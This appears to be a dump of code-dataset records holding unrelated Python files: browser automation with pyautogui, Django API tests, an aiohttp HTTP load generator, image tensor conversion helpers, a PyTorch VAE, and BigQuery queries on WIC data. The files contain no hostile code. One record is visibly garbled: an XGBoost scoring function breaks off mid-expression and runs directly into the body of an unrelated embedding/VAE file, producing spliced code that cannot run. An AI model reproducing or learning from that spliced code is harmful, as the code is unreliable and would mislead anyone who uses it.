"matplotlib.pyplot.figure", "line_number": 45, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 45, "usage_type": "name"}, {"api_name": "mpl_toolkits.mplot3d.Axes3D", "line_number": 46, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 49, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 49, "usage_type": "name"}, {"api_name": "sklearn.manifold.TSNE", "line_number": 56, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.clf", "line_number": 62, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 62, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.cla", "line_number": 63, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 63, "usage_type": "name"}, {"api_name": "numpy.choose", "line_number": 64, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 66, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 66, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 68, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 68, "usage_type": "name"}, {"api_name": "mpl_toolkits.mplot3d.Axes3D", "line_number": 69, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 72, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 72, "usage_type": "name"}, {"api_name": "cPickle.load", "line_number": 77, "usage_type": "call"}]}
+{"seq_id": "61919113", "text": "import pyautogui\r\nimport time\r\nfrom selenium import webdriver\r\n\r\n#定义图像识别双击事件\r\ndef mouseDoubleClick(image):\r\n x,y=pyautogui.locateCenterOnScreen(image,confidence=0.9)\r\n pyautogui.click(x,y,clicks=2,interval=0.2,duration=0.2,button='left')\r\n\r\n#定义单击事件\r\ndef mouseClick(image):\r\n x,y=pyautogui.locateCenterOnScreen(image,confidence=0.9)\r\n pyautogui.click(x,y,clicks=1,interval=0.2,duration=0.2,button='left')\r\n\r\nmouseDoubleClick(image = 'chorm.png')\r\n\r\npyautogui.write(\"www.baidu.com\")\r\ntime.sleep(1)\r\npyautogui.press(\"enter\")\r\ntime.sleep(3)\r\n\r\npyautogui.write(\"Detroit: Become Human\")\r\ntime.sleep(2)\r\npyautogui.press(\"enter\")\r\n", "sub_path": "students/Siyang Liu/pyaotugui/pyautogui_serch.py", "file_name": "pyautogui_serch.py", "file_ext": "py", "file_size_in_byte": 667, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "pyautogui.locateCenterOnScreen", "line_number": 7, "usage_type": "call"}, {"api_name": "pyautogui.click", "line_number": 8, "usage_type": "call"}, {"api_name": "pyautogui.locateCenterOnScreen", "line_number": 12, "usage_type": "call"}, {"api_name": "pyautogui.click", "line_number": 13, "usage_type": "call"}, {"api_name": "pyautogui.write", "line_number": 17, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 18, "usage_type": "call"}, {"api_name": "pyautogui.press", "line_number": 19, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 20, "usage_type": "call"}, {"api_name": "pyautogui.write", "line_number": 22, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 23, "usage_type": "call"}, {"api_name": "pyautogui.press", "line_number": 24, "usage_type": "call"}]}
+{"seq_id": "115663981", "text": "from tastypie.test import ResourceTestCase\nfrom projects.tests.factories import ProjectFactory\nfrom tools.mongo import MongoFlushMixin\nfrom .. import models\n\n\nclass BaseTaskResourceCase(MongoFlushMixin, ResourceTestCase):\n \"\"\"Base task resource case\"\"\"\n mongo_flush = ['tasks']\n\n def setUp(self):\n MongoFlushMixin.setUp(self)\n ResourceTestCase.setUp(self)\n\n ProjectFactory(name='test', is_enabled=True)\n\n\nclass RawTaskResourceCase(BaseTaskResourceCase):\n \"\"\"Create task case\"\"\"\n\n def setUp(self):\n super(RawTaskResourceCase, self).setUp()\n self.url = '/api/v1/tasks/raw/'\n\n def test_create_on_post(self):\n \"\"\"Test create on post\"\"\"\n self.api_client.post(self.url, data={\n 'service': {\n 'name': 'dummy',\n },\n 'project': 'test',\n 'commit': {\n 'branch': 'develop',\n 'commit': 'asdfg',\n 'author': 'nvbn',\n },\n 'violations': [\n {'name': 'dummy', 'raw': '1'},\n ]\n })\n self.assertEqual(1, models.Tasks.count())\n\n def test_error_on_wrong_service(self):\n \"\"\"Test error on wrong service\"\"\"\n response = self.api_client.post(self.url, data={\n 'service': {\n 'name': 'dummy!!!',\n },\n 'project': 'test',\n 'commit': {\n 'branch': 'develop',\n 'commit': 'asdfg',\n 'author': 'nvbn',\n },\n 'violations': [\n {'name': 'dummy', 'raw': '1'},\n ]\n })\n self.assertEqual(response.status_code, 404)\n\n def test_error_on_wrong_project(self):\n \"\"\"Test error on wrong project\"\"\"\n response = self.api_client.post(self.url, data={\n 'service': {\n 'name': 'dummy',\n },\n 'project': 'test!!',\n 'commit': {\n 'branch': 'develop',\n 'commit': 'asdfg',\n 'author': 'nvbn',\n },\n 'violations': [\n {'name': 'dummy', 'raw': '1'},\n ]\n })\n self.assertEqual(response.status_code, 404)\n\n\nclass TaskResourceCase(BaseTaskResourceCase):\n \"\"\"Get tasks resource case\"\"\"\n\n def setUp(self):\n super(TaskResourceCase, self).setUp()\n self.url = '/api/v1/tasks/task/'\n\n def _create_tasks(self, project='test', count=20):\n \"\"\"Create tasks\"\"\"\n models.Tasks.insert([{\n 'service': {\n 'name': 'dummy',\n },\n 'project': project,\n 'commit': {\n 'branch': 'develop',\n 'commit': 'asdfg',\n 'author': 'nvbn',\n },\n 'violations': [{\n 'name': 'dummy',\n 'raw': '1',\n 'status': 1,\n 'prepared': '123{}'.format(n),\n }]\n } for n in range(count)])\n\n def test_get_all(self):\n \"\"\"Test get all\"\"\"\n self._create_tasks()\n response = self.api_client.get(self.url)\n data = self.deserialize(response)\n self.assertEqual(data['meta']['total_count'], 20)\n self.assertIsNone(data['objects'][0]['violations'])\n\n def test_get_all_with_violations(self):\n \"\"\"Test get all with violations\"\"\"\n self._create_tasks()\n response = self.api_client.get('{}?with_violations=1'.format(self.url))\n data = self.deserialize(response)\n self.assert_(data['objects'][0]['violations'][0]['name'])\n self.assert_(data['objects'][0]['violations'][0]['status'])\n\n def test_get_with_full_violations(self):\n \"\"\"Test get with full violations\"\"\"\n self._create_tasks()\n response = self.api_client.get(\n '{}?with_full_violations=1'.format(self.url),\n )\n data = self.deserialize(response)\n self.assert_(data['objects'][0]['violations'][0]['raw'])\n self.assert_(data['objects'][0]['violations'][0]['prepared'])\n\n def test_filter_by_project(self):\n \"\"\"Test filter by project\"\"\"\n self._create_tasks('test', 5)\n self._create_tasks('nope', 10)\n response = self.api_client.get('{}?project=test'.format(self.url))\n data = self.deserialize(response)\n self.assertEqual(data['meta']['total_count'], 5)\n", "sub_path": "tasks/tests/test_resources.py", "file_name": "test_resources.py", "file_ext": "py", "file_size_in_byte": 4398, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "tools.mongo.MongoFlushMixin", "line_number": 7, "usage_type": "name"}, {"api_name": "tastypie.test.ResourceTestCase", "line_number": 7, "usage_type": "name"}, {"api_name": "tools.mongo.MongoFlushMixin.setUp", "line_number": 12, "usage_type": "call"}, {"api_name": "tools.mongo.MongoFlushMixin", "line_number": 12, "usage_type": "name"}, {"api_name": "tastypie.test.ResourceTestCase.setUp", "line_number": 13, "usage_type": "call"}, {"api_name": "tastypie.test.ResourceTestCase", "line_number": 13, "usage_type": "name"}, {"api_name": "projects.tests.factories.ProjectFactory", "line_number": 15, "usage_type": "call"}]}
+{"seq_id": "278185694", "text": "#!/usr/bin/env python3.5\n\n\nimport aiohttp\nimport argparse\nimport asyncio\nimport functools\nimport requests\nimport multiprocessing as mp\nimport time\n\nimport config\nfrom logger import *\n\n\nclass ReusedSession:\n \"\"\" Session for connect to a server. Reuse after return a response (for keep-alive)\n Parameters:\n session (aiohttp.ClientSession): session for connect\n working (bool): flag shows the session does not have work for server \n \"\"\"\n def __init__(self):\n self.session = aiohttp.ClientSession()\n self.working = False\n self.failed = False\n\n\ndef get_free_session(sessions, loggers):\n \"\"\" Find not working session for assign new work. Create new one if no available sessions\n Args:\n sessions (list)\n sessions.item (ReusedSession)\n Returns:\n ReusedSession\n \"\"\"\n LOG, LOG_ERR = loggers\n\n failed_session_num = []\n free_session = None\n for i, s in enumerate(sessions):\n if s.failed:\n failed_session_num.append(i)\n continue\n\n if not s.working:\n free_session = s\n break\n\n # Reverse sort for correct delete in array - index out of range\n failed_session_num = sorted(failed_session_num, reverse=True)\n for i in failed_session_num:\n #LOG.put( LogMsg(LN.err.FAIL_SESSION, time.time()) )\n sessions[i].session.close()\n del sessions[i]\n\n if free_session is not None:\n return free_session\n\n s = ReusedSession()\n sessions.append(s)\n #LOG.put( LogMsg(LN.info.NEW_SESSION, time.time()) )\n\n return s\n\n\ndef free_session(session, *args):\n \"\"\" Returns for session opportunity reused\n Args:\n session (ReusedSession)\n Returns:\n void\n \"\"\"\n session.working = False\n\n\nasync def request(host, port, path, session, loggers):\n \"\"\" Requests server and wait response \n Args:\n session (ReusedSession)\n Returns:\n void\n \"\"\"\n LOG, LOG_ERR = loggers\n\n request_url = \"http://\" + host + \":\" + port + path\n\n try:\n async with aiohttp.client._RequestContextManager(session.session._request(aiohttp.hdrs.METH_GET, request_url)) as resp:\n #LOG.put( LogMsg(LN.info.REQUEST, time.time()) )\n await resp.text()\n asyncio.sleep(1)\n except Exception as err:\n #LOG_ERR.put( LogMsg(LN.err.REQUEST, time.time()) )\n session.failed = True\n asyncio.sleep(1)\n\n\ndef calc_rate(time_since_start, limit_rate):\n \"\"\" Suppose we need reach `limit_rate` in some time\n Args:\n time_since_start (int): num of seconds since start\n limit_rate (int): max rate for perfomance test\n Returns:\n curr_rate (int): rate for current time\n \"\"\"\n init_rate = config.INIT_RATE\n step_rate = config.STEP_RATE\n\n rate = init_rate + time_since_start * step_rate\n\n return [round(rate), limit_rate][rate > limit_rate]\n\n\nasync def schedule_send_requests(loop, host, port, path, rate, loggers):\n \"\"\" Schedule envoke send_requests with calculated rate every second\n Args:\n loop (asyncio.BaseEventLoop)\n host (str)\n port (str)\n rate (int)\n Returns:\n void\n \"\"\"\n reused_sessions = []\n it_num = -1\n \n while True:\n it_num += 1\n\n curr_rate = calc_rate(it_num, rate)\n task = loop.create_task( send_requests(loop=loop, host=host, port=port, path=path, rate=curr_rate, sessions=reused_sessions, loggers=loggers) )\n await asyncio.sleep(1)\n\n\nasync def send_requests(loop, host, port, path, rate, sessions, loggers):\n \"\"\" Sent requests for server 'host:port' with specified rate (rps)\n Args:\n loop (asyncio.BaseEventLoop)\n host (str)\n port (str)\n rate (int)\n Returns:\n void\n \"\"\"\n for i in range(rate):\n session = get_free_session(sessions, loggers)\n session.working = True\n task = loop.create_task( request(host, port, path, session, loggers) )\n task.add_done_callback( functools.partial(free_session, session) )\n\n\ndef load(host, port, path, rate, loggers):\n loop = asyncio.get_event_loop()\n loop.run_until_complete(\n schedule_send_requests(loop=loop, host=host, port=port, path=path, rate=rate, loggers=loggers))\n loop.close()\n\n\ndef parse_cmd():\n # for load simple nginx with sleep 1sec - the max for localhost 6processes x40 rate\n # beyond can't guarantee to maintain the level of rate (limit at cpu)\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--rate\", type=int, required=True)\n parser.add_argument(\"--host\", type=str, required=True)\n parser.add_argument(\"--port\", type=str, required=True)\n parser.add_argument(\"--path\", type=str, required=True)\n\n return parser.parse_args()\n\n\nif __name__ == \"__main__\":\n args = parse_cmd()\n load(args.host, args.port, args.path, args.rate, (None, None))\n", "sub_path": "loader/src/loader.py", "file_name": "loader.py", "file_ext": "py", "file_size_in_byte": 4883, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "aiohttp.ClientSession", "line_number": 23, "usage_type": "call"}, {"api_name": "aiohttp.client._RequestContextManager", "line_number": 88, "usage_type": "call"}, {"api_name": "aiohttp.client", "line_number": 88, "usage_type": "attribute"}, {"api_name": "aiohttp.hdrs", "line_number": 88, "usage_type": "attribute"}, {"api_name": "asyncio.sleep", "line_number": 91, "usage_type": "call"}, {"api_name": "asyncio.sleep", "line_number": 95, "usage_type": "call"}, {"api_name": "config.INIT_RATE", "line_number": 106, "usage_type": "attribute"}, {"api_name": "config.STEP_RATE", "line_number": 107, "usage_type": "attribute"}, {"api_name": "asyncio.sleep", "line_number": 132, "usage_type": "call"}, {"api_name": "functools.partial", "line_number": 149, "usage_type": "call"}, {"api_name": "asyncio.get_event_loop", "line_number": 153, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 162, "usage_type": "call"}]}
+{"seq_id": "213947405", "text": "#!/usr/bin/env python\n# encoding=utf8\n#########################################################################\n# Author:\n# Created Time: Thu 08 Nov 2018 08:48:39 PM CST\n# File Name: convert.py\n# Description: tensor pil cv numpy\n#########################################################################\n\nimport cv2\nimport numpy as np\nimport PIL\nimport torch\nfrom torchvision import transforms\n\n# tensor [C, H, W] 取值范围是[0, 1.0] 一般经过normalization\n# pil [H,W,C] 取值范围是[0,255] RGB\n# cv [H,W,C] 取值范围是[0,255] GBR\n\n# pil to numpy\n# np_obj = np.array( pil_obj )\n\n# numpy to pil i\n# pil_obj = PIL.Image.fromarray( np_obj ).convert('RGB')\n\n# tensor => numpy\n# np_obj = tensor.numpy()\n\n# numpy => tensor\n# tensor = torch.Tensor(np_obj)\n\n# pil to cv\n# cv_obj = np.array(pil_img)[:, :, ::-1].copy()\n\n# cv to pil\n# pil_obj = PIL.Image.fromarray(cv_obj.astype('uint8')[:, :, ::-1], mode='RGB')\n\n# tensor to pil\n# pil_img = transforms.ToPILImage()(tensor_obj).convert(\"RGB\")\n# = transpose + *255\n\ndef tensor_to_pil(tensor_img, MEAN=[], STD=[]):\n if MEAN and STD:\n np_img = tensor_img.numpy()\n for i in range(0, 3):\n np_img[i] = np_img[i] * STD[i] + MEAN[i] # unnormalize\n pil_img = transforms.ToPILImage()(torch.from_numpy(np_img)).convert(\"RGB\")\n else:\n pil_img = transforms.ToPILImage()(tensor_img).convert(\"RGB\")\n return pil_img\n\ndef tensor_to_cv(tensor_img, MEAN=[], STD=[]):\n pil_img = tensor_to_pil(tensor_img, MEAN, STD)\n cv_img = np.array(pil_img)[:, :, ::-1].copy()\n return cv_img\n\n\nif __name__ == '__main__':\n\n MEAN = [0.485, 0.456, 0.406]\n STD = [0.229, 0.224, 0.225]\n img_transform = transforms.Compose([transforms.Resize((224, 224)), transforms.ToTensor(), transforms.Normalize(MEAN, STD)])\n pil_img = PIL.Image.open(\"color.jpg\").convert(\"RGB\")\n\n # pil to tensor\n tensor_img = img_transform(pil_img)\n\n pil_img = tensor_to_pil(tensor_img, MEAN, STD)\n pil_img.save(\"pil.jpg\")\n cv_img = np.array(pil_img)[:, :, ::-1].copy()\n cv2.imwrite(\"cv.jpg\", cv_img)\n", "sub_path": "mmcv/image/convert.py", "file_name": "convert.py", "file_ext": "py", "file_size_in_byte": 2079, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "torchvision.transforms.ToPILImage", "line_number": 47, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 47, "usage_type": "name"}, {"api_name": "torch.from_numpy", "line_number": 47, "usage_type": "call"}, {"api_name": "torchvision.transforms.ToPILImage", "line_number": 49, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 49, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 54, "usage_type": "call"}, {"api_name": "torchvision.transforms.Compose", "line_number": 62, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 62, "usage_type": "name"}, {"api_name": "torchvision.transforms.Resize", "line_number": 62, "usage_type": "call"}, {"api_name": "torchvision.transforms.ToTensor", "line_number": 62, "usage_type": "call"}, {"api_name": "torchvision.transforms.Normalize", "line_number": 62, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 63, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 63, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 70, "usage_type": "call"}, {"api_name": "cv2.imwrite", "line_number": 71, "usage_type": "call"}]}
+{"seq_id": "648911782", "text": "from xgboost.sklearn import XGBClassifier as XGBoost\nimport numpy as np\nfrom sklearn.linear_model.logistic import LogisticRegression as LR\nfrom sklearn.metrics import accuracy_score,confusion_matrix,roc_auc_score,matthews_corrcoef\nfrom sklearn.model_selection import StratifiedKFold\ndef scores(y_test,y_pred,th=0.5):\n y_predlabel=[(0 if item max_norm).float() # ).squeeze()\n result_new = result / norm * norm_mask + result * (1 - norm_mask)\n #result[:,norm_mask,:] = result[:,norm_mask,:].div(norm[:,norm_mask,:])\n else:\n result_new = result\n\n # self.last_weight = weight.clone() # NOTE: waste of memory?\n\n return result_new\n\n def to_one_hot(self, input):\n # Returns a new tensor that doesn't share memory\n result = torch.index_select(\n self.ones, 0, input.view(-1).long()).view(\n input.size()+(self.depth,))\n result.requires_grad = self.requires_grad\n return result\n\n def __repr__(self):\n return self.__class__.__name__ + \"({})\".format(self.depth)\n\n \nclass VAE(nn.Module):\n def __init__(self):\n\n super(VAE, self).__init__()\n\n feats = 3\n embedding_size = 50\n layer_size = 400\n latent_size = 5\n\n self.feat_info = [[\"time\",'categ',745],['pulocation','categ',266],['dozone','categ',7],['cnt','real',1]]\n self.size_input = feats*50+1\n self.size_output = feats + 1\n self.alpha = 0.95\n self.gauss = 2\n ## Encoder Params\n\n # define a different embedding matrix for each feature\n self.feat_embedd = nn.ModuleList([nn.Embedding(c_size, embedding_size, max_norm=1)\n for _, col_type, c_size in self.feat_info\n if col_type==\"categ\"])\n\n self.fc1 = nn.Linear(self.size_input, layer_size)\n self.fc21 = nn.Linear(layer_size, latent_size)\n self.fc22 = nn.Linear(layer_size, latent_size)\n\n ## Decoder Params\n\n self.fc3 = nn.Linear(latent_size,layer_size)\n\n self.out_cat_linears = nn.ModuleList([nn.Linear(layer_size, c_size) if col_type==\"categ\"\n else nn.Linear(layer_size, c_size)\n for _, col_type, c_size in self.feat_info])\n\n self.logvar_x = nn.Parameter(torch.zeros(1,1).float())\n\n ## Other\n\n self.activ = nn.ReLU()\n\n self.logSoftmax = nn.LogSoftmax(dim=1)\n self.sigmoid = nn.Sigmoid()\n\n # define encoder / decoder easy access parameter list\n encoder_list = [self.fc1, self.fc21, self.fc22]\n self.encoder_mod = nn.ModuleList(encoder_list)\n if self.feat_embedd:\n self.encoder_mod.append(self.feat_embedd)\n\n self.encoder_param_list = nn.ParameterList(self.encoder_mod.parameters())\n\n decoder_list = [self.fc3, self.out_cat_linears]\n self.decoder_mod = nn.ModuleList(decoder_list)\n self.decoder_param_list = nn.ParameterList(self.decoder_mod.parameters())\n if len(self.logvar_x):\n self.decoder_param_list.append(self.logvar_x)\n\n\n def get_inputs(self, x_data):\n input_list = []\n cursor_embed = 0\n start = 0\n \n for feat_idx, ( _, col_type, feat_size ) in enumerate(self.feat_info):\n if col_type == \"categ\":\n aux_categ = self.feat_embedd[cursor_embed](x_data[:,feat_idx].long())#*drop_mask[:,feat_idx].view(-1,1)\n input_list.append(aux_categ)\n cursor_embed += 1\n \n elif col_type == \"real\": \n input_list.append((x_data[:,feat_idx]).view(-1,1).float())#*drop_mask[:,feat_idx]\n \n return torch.cat(input_list, 1)\n\n def encode(self, x_data):\n q_params = dict()\n input_values = self.get_inputs(x_data)\n fc1_out = self.fc1(input_values)\n h1_qz = self.activ(fc1_out)\n q_params['z'] = {'mu': self.fc21(h1_qz), 'logvar': self.fc22(h1_qz)}\n return q_params\n\n def sample_normal(self, q_params_z):\n if self.training:\n eps = torch.randn_like(q_params_z['mu'])\n std = q_params_z['logvar'].mul(0.5).exp_()\n return eps.mul(std).add_(q_params_z['mu'])\n else:\n return q_params_z['mu']\n\n def reparameterize(self, q_params):\n q_samples = dict()\n q_samples['z'] = self.sample_normal(q_params['z'])\n return q_samples\n\n def decode(self, z):\n p_params = dict()\n h3 = self.activ(self.fc3(z))\n out_cat_list = []\n\n for feat_idx, out_cat_layer in enumerate(self.out_cat_linears):\n if self.feat_info[feat_idx][1] == \"categ\": # coltype check\n out_cat_list.append(self.logSoftmax(out_cat_layer(h3)))\n elif self.feat_info[feat_idx][1] == \"real\":\n out_cat_list.append(out_cat_layer(h3))\n\n # tensor with dims (batch_size, self.size_output)\n p_params['x'] = torch.cat(out_cat_list, 1)\n p_params['logvar_x'] = self.logvar_x.clamp(-3,3)\n return p_params\n\n def forward(self, x_data, n_epoch=None):\n q_params = self.encode(x_data)\n q_samples = self.reparameterize(q_params)\n return self.decode(q_samples['z']), q_params, q_samples\n\n def loss_function(self, input_data, p_params, q_params, q_samples, clean_comp_only=False, data_eval_clean=False):\n\n \"\"\" ELBO: reconstruction loss for each variable + KL div losses summed over elements of a batch \"\"\"\n\n dtype_float = torch.cuda.FloatTensor\n nll_val = torch.zeros(1).type(dtype_float)\n # mixed datasets, or just categorical / continuous with medium number of features\n start = 0\n cursor_num_feat = 0\n\n for feat_select, (_, col_type, feat_size) in enumerate(self.feat_info):\n pi_feat = torch.sigmoid(q_params['w']['logit_pi'][:,feat_select]).clamp(1e-6, 1-1e-6)\n \n if clean_comp_only and data_eval_clean:\n pi_feat = torch.ones_like(q_params['w']['logit_pi'][:,feat_select])\n \n # compute NLL\n if col_type == 'categ':\n nll_val += nll_categ_global(p_params['x'][:,start:(start + feat_size)],\n input_data[:,feat_select].long(), feat_size, isRobust=True,\n w=pi_feat, isClean=clean_comp_only).sum()\n start += feat_size\n elif col_type == 'real':\n nll_val += nll_gauss_global(p_params['x'][:,start:(start + 1)], # 2\n input_data[:,feat_select],\n p_params['logvar_x'][:,cursor_num_feat], isRobust=True,\n w=pi_feat, isClean=clean_comp_only, \n std_0_scale=self.gauss).sum()\n start += 1 # 2\n cursor_num_feat +=1\n\n\n # kld regularizer on the latent space\n z_kld = -0.5 * torch.sum(1 + q_params['z']['logvar'] - q_params['z']['mu'].pow(2) - q_params['z']['logvar'].exp())\n\n # prior on clean cells (higher values means more likely to be clean)\n prior_sig = torch.tensor(self.alpha).type(dtype_float)\n\n # kld regularized on the weights\n pi_mtx = torch.sigmoid(q_params['w']['logit_pi']).clamp(1e-6, 1-1e-6)\n w_kld = torch.sum(pi_mtx * torch.log(pi_mtx / prior_sig) + (1-pi_mtx) * torch.log((1-pi_mtx) / (1-prior_sig)))\n\n loss_ret = nll_val + z_kld if clean_comp_only else nll_val + z_kld + w_kld\n\n return loss_ret, nll_val, z_kld, w_kld \n\n\n\n \n", "sub_path": "archived/RVAE_org_minimal/RVAE.py", "file_name": "RVAE.py", "file_ext": "py", "file_size_in_byte": 12049, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "torch.nn.functional.nll_loss", "line_number": 14, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 14, "usage_type": "name"}, {"api_name": "torch.nn.functional.nll_loss", "line_number": 19, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 19, "usage_type": "name"}, {"api_name": "torch.log", "line_number": 21, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 21, "usage_type": "call"}, {"api_name": "torch.ones", "line_number": 22, "usage_type": "call"}, {"api_name": "torch.nn.functional.nll_loss", "line_number": 26, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 26, "usage_type": "name"}, {"api_name": "torch.tensor", "line_number": 48, "usage_type": "call"}, {"api_name": "torch.log", "line_number": 49, "usage_type": "call"}, {"api_name": "torch.nn.Module", "line_number": 54, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 54, "usage_type": "name"}, {"api_name": "torch.eye", "line_number": 67, "usage_type": "call"}, {"api_name": "torch.set_grad_enabled", "line_number": 113, "usage_type": "call"}, {"api_name": "torch.stack", "line_number": 114, "usage_type": "call"}, {"api_name": "torch.mm", "line_number": 115, "usage_type": "call"}, {"api_name": "torch.index_select", "line_number": 133, "usage_type": "call"}, {"api_name": "torch.nn.Module", "line_number": 143, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 143, "usage_type": "name"}, {"api_name": "torch.nn.ModuleList", "line_number": 161, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 161, "usage_type": "name"}, {"api_name": "torch.nn.Embedding", "line_number": 161, "usage_type": "call"}, {"api_name": "torch.nn.Linear", "line_number": 165, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 165, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 166, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 166, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 167, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 167, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 171, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 171, "usage_type": "name"}, {"api_name": "torch.nn.ModuleList", "line_number": 173, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 173, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 173, "usage_type": "call"}, {"api_name": "torch.nn.Linear", "line_number": 174, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 174, "usage_type": "name"}, {"api_name": "torch.nn.Parameter", "line_number": 177, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 177, "usage_type": "name"}, {"api_name": "torch.zeros", "line_number": 177, "usage_type": "call"}, {"api_name": "torch.nn.ReLU", "line_number": 181, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 181, "usage_type": "name"}, {"api_name": "torch.nn.LogSoftmax", "line_number": 183, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 183, "usage_type": "name"}, {"api_name": "torch.nn.Sigmoid", "line_number": 184, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 184, "usage_type": "name"}, {"api_name": "torch.nn.ModuleList", "line_number": 188, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 188, "usage_type": "name"}, {"api_name": "torch.nn.ParameterList", "line_number": 192, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 192, "usage_type": "name"}, {"api_name": "torch.nn.ModuleList", "line_number": 195, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 195, "usage_type": "name"}, {"api_name": "torch.nn.ParameterList", "line_number": 196, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 196, "usage_type": "name"}, {"api_name": "torch.cat", "line_number": 215, "usage_type": "call"}, {"api_name": "torch.randn_like", "line_number": 227, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 250, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 263, "usage_type": "attribute"}, {"api_name": "torch.zeros", "line_number": 264, "usage_type": "call"}, {"api_name": "torch.sigmoid", "line_number": 270, "usage_type": "call"}, {"api_name": "torch.ones_like", "line_number": 273, "usage_type": "call"}, {"api_name": "torch.sum", "line_number": 292, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 295, "usage_type": "call"}, {"api_name": "torch.sigmoid", "line_number": 298, "usage_type": "call"}, {"api_name": "torch.sum", "line_number": 299, "usage_type": "call"}, {"api_name": "torch.log", "line_number": 299, "usage_type": "call"}]}
+{"seq_id": "151601083", "text": "## This poc script for converting WIC R code to python\nyour_project_id = \"project-wic_poc\"\nimport pandas as pd\nfrom google.cloud import bigquery\nimport sys\nimport time\n\n## global variables\nprojectId = 'chmdev'\ndbName = 'DATASETCHM2021_D1'\ntableNamePrefix = ''\nmoduleName = ''\nyear = ''\ndbConn = bigquery.Client() ##global conn\n\n## decorator\ndef add_datetime(func):\n reVal = ''\n\n def wrapper():\n start = time.perf_counter()\n print(func.__name__, \" : method started\")\n func()\n print(func.__name__, \" : method stopped\")\n\n return reVal\n\n\n## create db connection\ndef get_db_conn():\n return bigquery.Client()\n\n\n## get the query to run\ndef get_query(tableNamePrefix):\n tableName = tableNamePrefix + '_' + year\n baseQuery = \"SELECT * FROM `\" + projectId + \".\" + dbName + \".\" + tableName + \"`\"\n return baseQuery\n\n\n## get specific query\n# @add_datetime\ndef specificQuery(cat):\n queryWhole = \"\"\"SELECT a.*, a.Family_zip as ZipCode, case when a.certification_category in (1,2,3) then b.MomPopulation\n else b.ChildPopulation end as PopEstimates FROM `chmdev.DATASETCHM2021_D1.MD_WIC_2019` a\n left join `chmdev.DATASETCHM2021_D1.MD_PopEstimates2019` b on a.Family_zip= b.ZipCode\"\"\"\n\n ### WIC data by catorgery\n ###Mom data\n queryMom = \"\"\"SELECT a.*, a.Family_zip as ZipCode, case when a.certification_category in (1,2,3) then b.MomPopulation\n else b.ChildPopulation end as PopEstimates FROM `chmdev.DATASETCHM2021_D1.MD_WIC_2019` a \n left join `chmdev.DATASETCHM2021_D1.MD_PopEstimates2019` b on a.Family_zip = b.ZipCode\n where a.certification_category in (1, 2, 3)\n \"\"\"\n\n ### Child data\n queryChild = \"\"\"SELECT a.*, a.Family_zip as ZipCode, case when a.certification_category in (1,2,3) then b.MomPopulation\n else b.ChildPopulation end as PopEstimates FROM `chmdev.DATASETCHM2021_D1.MD_WIC_2019` a left\n join `chmdev.DATASETCHM2021_D1.MD_PopEstimates2019` b on a.Family_zip = b.ZipCode \n where a.certification_category in (5)\n \"\"\"\n ### Infant data\n queryInfant = \"\"\"SELECT a.*, a.Family_zip as ZipCode, case when a.certification_category in (1,2,3) then b.MomPopulation\n else b.ChildPopulation end as PopEstimates FROM `chmdev.DATASETCHM2021_D1.MD_WIC_2019` a left\n join 